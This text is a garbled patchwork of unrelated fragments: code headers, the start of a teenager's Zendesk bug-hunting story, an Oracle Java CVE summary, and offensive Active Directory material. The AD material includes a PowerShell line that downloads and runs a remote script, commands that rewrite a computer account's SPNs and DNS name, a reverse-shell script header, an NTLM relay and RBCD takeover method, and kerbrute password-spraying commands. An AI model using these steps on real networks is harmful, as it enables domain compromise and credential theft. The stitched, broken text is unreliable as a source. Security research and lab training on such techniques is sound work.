| #include <windows.h> | |
| #include <iostream> | |
| #include <sstream> | |
| std::string | |
| GetSymbolServerURL( | |
| const std::string& moduleName | |
| ) | |
| { | |
| /* Extract timestamp and image size from a module |
hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:
If you've spent some time online, youโve probably come across Zendesk.
Zendesk is a customer service tool used by some of the worldโs top companies. Itโs easy to set up: you link it to your companyโs support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.
Personally, Iโve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
| using NtApiDotNet; | |
| using NtApiDotNet.Ndr.Marshal; | |
| using NtApiDotNet.Win32; | |
| using NtApiDotNet.Win32.Rpc.Transport; | |
| using NtApiDotNet.Win32.Security.Authentication; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server; | |
| using NtApiDotNet.Win32.Security.Authentication.Logon; | |
| using System; |
| iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing ) | |
| Import-ActiveDirectory | |
| Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose | |
| #in my testing i had to set dnshostname to $null first | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local |
| <# | |
| DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
| The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
| Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
| from ws2_32.dll. | |
| This script should be used for educational purposes only (and maybe while playing CTF :D). | |
| It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
| purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |
| :: Windows 10 OSED Setup | |
| :: | |
| :: Connect over RDP with: rdesktop IP -u Offsec -p lab -r disk:kali=/home/kali/OSED/ -P | |
| :: Store files in ~/OSED/files/. Check script for appropriate file locations | |
| :: | |
| :: Extra files sourced from: https://github.com/corelan/windbglib | |
| :: | |
| :::::::::::::::::::::::::::::::::::::::::::::::::::::::: | |
| :: Install mona |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: